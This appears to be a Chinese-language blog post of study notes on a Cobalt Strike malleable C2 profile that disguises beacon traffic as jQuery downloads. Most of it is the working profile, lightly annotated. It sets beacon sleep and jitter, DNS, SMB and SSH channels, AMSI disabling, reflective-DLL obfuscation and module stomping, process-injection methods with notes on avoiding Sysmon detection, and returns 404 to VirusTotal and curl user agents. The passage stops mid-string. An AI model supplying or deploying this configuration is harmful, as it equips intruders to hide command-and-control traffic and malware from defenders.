Cobalt Strike Profile 学习记录
2024-06-13 20:09:38
此处以最新版 jquery-c2.4.3.profile 为例,学习记录各项配置的作用。部分配置尚未研究清楚适用场景,后续继续学习再补充。
cobalt strike 4.3 官方文档:https://cobaltstrike.com/downloads/csmanual43.pdf
提示
- 关于参数与值:
profile 文件将参数括在双引号中,而不是单引号中。例如:
正确: set useragent "SOME AGENT";
错误: set useragent 'SOME AGENT';
- 一些特殊字符不需要转义,例如:
!@#$%^&*() - 值可以使用分号, 例如:
prepend "This is an example;";
- 值中的双引号需要转义, 例如:
append "here is \"some\" stuff";
- 双斜杠表示单斜杠:例如:
append "more \\ stuff";
- 编译后的
.http-post.client必须小于252个字节。
配置解读
set sample_name "jQuery CS 4.3 Profile";
设置配置文件名称,此处会显示在输出的报告中。
set sleeptime "45000";
设置上线后的睡眠时间,45000单位是毫秒。 此处不要设置为0, 设置为0后木马无法上线。cobalt strike 默认的睡眠时间是60000ms 。
set jitter "37";
设置抖动频率,默认是0.
set data_jitter "100";
设置数据抖动大小。设置后,在请求的过程中,会追加随机长度(小于设置的值)的随机字符串。
set headers_remove "Strict-Transport-Security, header2, header3";
全局选项,强制Beacon的WinINet在HTTP/HTTPS请求中删除指定的请求头。
set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";
设置请求的UA,此处可以结合nginx反向代理,对stage进行隐藏。 此项默认是IE的随机UA,在CS小于4.2的版本最大字符是128, CS4.2以上的版本最大字符是255。
https-certificate {## 选项 1) 使用可信的签名证书## 使用 keytool 创建一个 Java Keystore 文件. ## 参考: https://www.cobaltstrike.com/help-malleable-c2#validssl## 参考: https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/HTTPsC2DoneRight.sh## 选项 2) 使用自创建的自签名证书## 使用 keytool 导入自签名证书#set keystore "/pathtokeystore"; :设置keystore路径#set password "password"; :设置证书密码## 选项3 3) 使用Cobalt Strike自签名证书set C "US";set CN "jquery.com";set O "jQuery";set OU "Certificate Authority";set validity "365";
}
SSL证书配置,用于对C2的https监听配置签名、自签名证书。默认是所有的证书值均为空。这里CS官方建议是:使用可信的证书签名。
set tcp_port "42585";
set tcp_frame_header "\x80";
TCP Beacon 的相关设置,tcp监听端口详细信息可以参考:https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/ 、 https://www.cobaltstrike.com/help-tcp-beacon 。 tcp_frame_header可以在tcp信息前追加设定的字符。Cobalt Strike默认使用的tcp监听端口为4444, 且不在信息前追加字符。
官方指导意见:不建议使用4444端口进行监听。建议使用高端口监听。
set pipename "mojo.5688.8052.183894939787088877##"; # Common Chrome named pipe
set pipename_stager "mojo.5688.8052.35780273329370473##"; # Common Chrome named pipe
set smb_frame_header "\x80";
SMB Beacon的相关设置。使用SMB进行对等通信。CS4.1版本之后加入SMB Frame Header选项。CS默认使用的管道名为:
msagent_##,pipename_stager为:status_##。
官方建议:不要使用已经存在的命名管道,beacon不会检测是否与已存在的管道名冲突。配置文件使用者要把##替换成数字
dns-beacon {# Options moved into "dns-beacon" group in version 4.3set dns_idle "74.125.196.113"; #google.com (change this to match your campaign)set dns_max_txt "252";set dns_sleep "0"; # Force a sleep prior to each individual DNS request. (in milliseconds)set dns_ttl "5";set maxdns "255";set dns_stager_prepend ".resources.123456.";set dns_stager_subhost ".feeds.123456.";# DNS subhosts override options, added in version 4.3set beacon "a.bc.";set get_A "b.1a.";set get_AAAA "c.4a.";set get_TXT "d.tx.";set put_metadata "e.md.";set put_output "f.po.";set ns_response "zero";
}
DNS Beacon 的相关配置。DNS beacon 会生成大量的DNS请求。DNS Beacon最好用作低速备份C2通道。
set ssh_banner "OpenSSH_7.4 Debian (protocol 2.0)";
set ssh_pipename "wkssvc##";
SSH Beacon 的相关配置。使用SSH协议进行P2P对等通信。Cobalt Strike 4.1版本开始使用。
set host_stage "false";
不建议使用host_stage。建议使用stageles有效负载,现在是Cobalt Strike的默认选项。
http-stager { # x86的请求地址set uri_x86 "/jquery-3.3.1.slim.min.js"; # x64的请求地址set uri_x64 "/jquery-3.3.2.slim.min.js";server {# 服务端的相关配置# 设置header 信息header "Server" "NetDNA-cache/2.2";header "Cache-Control" "max-age=0, no-cache";header "Pragma" "no-cache";header "Connection" "keep-alive";header "Content-Type" "application/javascript; charset=utf-8";output {## 在实际的请求中追加jquery字符串进行伪装。 prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";# 1st Lineprepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";print;}}client {# 设置客户端请求的请求头信息。header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";header "Accept-Language" "en-US,en;q=0.5";#header "Host" "code.jquery.com";header "Referer" "http://code.jquery.com/";header "Accept-Encoding" "gzip, deflate";}
}
http stager的相关配置。
post-ex {# Optionally specify non-existent filepath to force manual specification based on the Beacon host's running processesset spawnto_x86 "%windir%\\syswow64\\dllhost.exe";# Hardcode paths like C:\\Windows\\System32\\dllhost.exe to avoid potential detections for %SYSNATIVE% use. !! This will break when attempting to spawn a 64bit post-ex job from a 32bit Beacon.set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";# change the permissions and content of our post-ex DLLsset obfuscate "true";# pass key function pointers from Beacon to its child jobsset smartinject "true";# disable AMSI in powerpick, execute-assembly, and psinjectset amsi_disable "true";# Modify our post-ex pipe namesset pipename "Winsock2\\CatalogChangeListener-###-0,";set keylogger "GetAsyncKeyState";#set threadhint "module!function+0x##"
}
spawnto 的相关配置。
官方指导:spawnto只需要63个字节。选择spawn的程序中,禁止选用这些:"csrss.exe","logoff.exe","rdpinit.exe","bootim.exe","smss.exe","userinit.exe","sppsvc.exe"。 在spawn的过程中可以添加相应的参数。
开启obfuscate后,会扰乱post-ex DLLs 的内容,使整个过程更安全。
开启amsi_disable后,会在执行powerpick、execute-assembly、 psinject这些命令前限制amsi检测。
stage {# CS 4.2 申请内存的方式, 支持三种:HeapAlloc, MapViewOfFile, and VirtualAllocset allocator "VirtualAlloc"; # Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc# 覆盖Beacon 反射DLL的第一个字节(包括MZ头)。需要有效的x86指令。按照更改CPU状态的说明和撤消更改的说明进行操作。#set magic_mz_x86 "MZRE";#set magic_mz_x64 "MZAR";# 用另一个值覆盖Beacon的反射加载程序使用的PE字符标记。set magic_pe "NO";# 要求ReflectiveLoader对内存中的Beacon DLL使用或避免读写、执行权限set userwx "false"; # 要求ReflectiveLoader 在加载Beacon之后,重新stomp MZ, PE, 和 e_lfanew的值。set stomppe "true";# 模糊反射DLL的导入表,覆盖未使用的头内容,并要求ReflectiveLoader将Beacon复制到没有其DLL头的新内存中。从4.2开始,CS现在会混淆rDLL包中的.text部分set obfuscate "true";# 要求Beacon尝试释放与初始化它的反射DLL包关联的内存。set cleanup "true";# CS 3.12 Addition "Obfuscate and Sleep"set sleep_mask "true";# CS 4.1 set smartinject "true";# Make the Beacon Reflective DLL look like something else in memory# Values captured using peclone agaist a Windows 10 version of explorer.exe# PE头部校验值set checksum "0";# PE头编译时间set compile_time "11 Nov 2016 04:08:32";# PE头入口值set entry_point "650688";# 32位PE头镜像大小set image_size_x86 "4661248";# 64位PE头镜像大小set image_size_x64 "4661248";# 导出的DLL名称set name "srv.dll";# 由编译器插入的元数据信息set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";## WARNING: Module stomping # Cobalt Strike 3.11 also adds module stomping to Beacon's Reflective Loader. When enabled, Beacon's loader will shun VirtualAlloc and instead load a DLL into the current process and overwrite its memory.# Set module_x86 to a favorite x86 DLL to module stomp with the x86 Beacon. The module_x64 option enables this for the x64 Beacon.# While this is a powerful feature, caveats apply! If the library you load is not large enough to host Beacon, you will crash Beacon's process. If the current process loads the same library later (for whatever reason), you will crash Beacon's process. Choose carefully.# By default, Beacon's loader allocates memory with VirtualAlloc. Module stomping is an alternative to this. Set module_x86 to a DLL that is about twice as large as the Beacon payload itself. Beacon's x86 loader will load the specified DLL, find its location in memory, and overwrite it. This is a way to situate Beacon in memory that Windows associates with a file on disk. It's important that the DLL you choose is not needed by the applications you intend to reside in. The module_x64 option is the same story, but it affects the x64 Beacon.# Details can be found in the In-memory Evasion video series. https://youtu.be/uWVH9l2GMw4# set module_x64 "netshell.dll";# set module_x86 "netshell.dll";# The transform-x86 and transform-x64 blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep.transform-x86 { # transform the x86 rDLL stage# 在shellcode前追加内容prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops# 替换敏感字符strrep "ReflectiveLoader" "execute"; # Change this text# 删除敏感字符strrep "This program cannot be run in DOS mode" ""; # Remove this textstrrep "beacon.dll" ""; # Remove this text}transform-x64 { # transform the x64 rDLL stageprepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nopsstrrep "ReflectiveLoader" "execute"; # Change this text in the Beacon DLLstrrep "beacon.x64.dll" ""; # Remove this text in the Beacon DLL}stringw "jQuery"; # Add this string to the DLL
}stage 的相关配置。
process-inject {# 设置远程内存分配方法: VirtualAllocEx|NtMapViewOfSectionset allocator "NtMapViewOfSection";# 注入内容时的最小内存分配大小set min_alloc "17500";# 设置内存权限 initial=RWX, final=RXset startrwx "false";set userwx "false";# 转换注入的内容以避免前几个字节的签名检测。只支持prepend和append。transform-x86 {prepend "\x90\x90";#append "\x90\x90";}transform-x64 {prepend "\x90\x90";#append "\x90\x90";}## The execute block controls the methods Beacon will use when it needs to inject code into a process. Beacon examines each option in the execute block, determines if the option is usable for the current context, tries the method when it is usable, and moves on to the next option if code execution did not happen. The execute options include:## Name x86->x64 x64-x86 Notes########################################################################## CreateThread Current Process only# CreateRemoteThread Yes No cross-session# NtQueueApcThread # NtQueAPCThread-s This is the "Early Bird" injection technique. Suspended processes (e.g., post-ex jobs) only.# RtlCreateUserThread Yes Yes Risky on XP-era targets; uses RWX shellcode for x86->x64 injection.# SetThreadContext Yes Suspended processes (e.g. post-ex jobs only)execute {# 下述方法顺序很重要,CS会按照顺序进行尝试注入,直至成功。## self-injectionCreateThread "ntdll!RtlUserThreadStart+0x42";CreateThread;## 通过挂起的进程注入 (SetThreadContext|NtQueueApcThread-s)# OPSEC - 使用SetThreadContext时,线程的起始地址将反映临时进程的原始执行入口点。# SetThreadContext;NtQueueApcThread-s;## 注入到存在的进程# OPSEC Uses RWX stub - 由Get InjectedThread检测到。一些防御性产品较少检测到。#NtQueueApcThread; # CreateRemotThread - 香草跨过程注射技术。不跨越会话边界# OPSEC - fires Sysmon Event 8CreateRemoteThread;# RtlCreateUserThread - 支持所有依赖于体系结构的转角情况(例如,32位->64位注入)和跨会话边界的注入# OPSEC - fires Sysmon Event 8. Uses Meterpreter implementation and RWX stub - Detected by Get-InjectedThreadRtlCreateUserThread; }
}
进程注入相关配置
http-config {# 设置http头信息set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type";header "Server" "Apache";header "Keep-Alive" "timeout=10, max=100";header "Connection" "Keep-Alive";# 如果您的teamserver位于重定向器后面,请使用此选项set trust_x_forwarded_for "true";# 检测到某些UA的请求,会针对性的返回404set block_useragents "*virustotal*,curl*,lynx*,wget*";
}
HTTP服务的相关配置
http-get {# 设置请求接口, 可以添加多个URI。Beacon会随机从中选取set uri "/jquery-3.3.1.min.js";# 设置请求方法set verb "GET";client {# 设置客户端请求头信息header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";#header "Host" "code.jquery.com";header "Referer" "http://code.jquery.com/";header "Accept-Encoding" "gzip, deflate";metadata {base64url;prepend "__cfduid=";header "Cookie";}}server {# 服务端的相关配置header "Server" "NetDNA-cache/2.2";header "Cache-Control" "max-age=0, no-cache";header "Pragma" "no-cache";header "Connection" "keep-alive";header "Content-Type" "application/javascript; charset=utf-8";output { mask;base64url;## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)# 2nd Line prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";# 1st Lineprepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";print;}}
}
http get请求的相关配置。
http-post {# http post 请求相关配置set uri "/jquery-3.3.2.min.js";set verb "POST";client {header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";#header "Host" "code.jquery.com";header "Referer" "http://code.jquery.com/";header "Accept-Encoding" "gzip, deflate";id {mask; base64url;parameter "__cfduid"; }output {mask;base64url;print;}}server {header "Server" "NetDNA-cache/2.2";header "Cache-Control" "max-age=0, no-cache";header "Pragma" "no-cache";header "Connection" "keep-alive";header "Content-Type" "application/javascript; charset=utf-8";output {mask;base64url;## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)# 2nd Line prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in 